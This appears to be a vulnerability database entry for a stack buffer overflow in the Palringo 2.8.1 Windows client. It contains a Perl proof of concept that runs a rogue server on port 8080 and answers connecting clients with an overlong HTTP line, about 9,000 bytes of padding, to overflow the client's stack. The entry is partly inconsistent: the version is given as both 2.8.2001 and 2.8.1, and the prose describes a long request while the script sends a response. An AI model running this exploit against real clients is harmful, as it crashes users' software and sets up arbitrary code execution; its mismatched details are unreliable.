palringo stack buffer overflow

vendor:

Palringo

by:

Mr.ALmfL9

9.3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Palringo

Affected Version From: 2.8.2001

Affected Version To: 2.8.2001

Patch Exists: YES

Related CWE: N/A

CPE: a:palringo:palringo

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 8.1

2015

palringo stack buffer overflow

A buffer overflow vulnerability was discovered in Palringo version 2.8.1. The vulnerability is caused due to a boundary error within the application when handling user supplied input. This can be exploited to cause a stack-based buffer overflow by sending an overly long HTTP request to the affected application. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Palringo.

Source

Exploit-DB raw data:

#!/use/bin/perl
# Exploit Title: ‫palringo stack buffer overflow
# Date: 10 January 2015
# Vulnerability discovered by: Mr.ALmfL9
# Vendor Homepage: http://www.palringo.com/
# Software Link: http://www.palringo.com/ar/sa/download/?get=winpc
# Version: 2.8.1
# Tested on: Windows 8.1 
use IO::Socket;
$port  = 8080;
my $payload = "\x41" x 144;
$payload = $payload. "\x42" x 4 ;
$payload = $payload. "\x42" x 9000;
$serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n";
while($cli=$serv->accept()){
print "[#] port is: $port\n";
print $cli "HTTP/$payload\r\n\r\n";
while(<$cli>){
print $cli;

}
}
#*REFERENCE*
#.1=http://store2.up-00.com/2015-01/1420867197761.png
#.2=http://store2.up-00.com/2015-01/1420867235381.png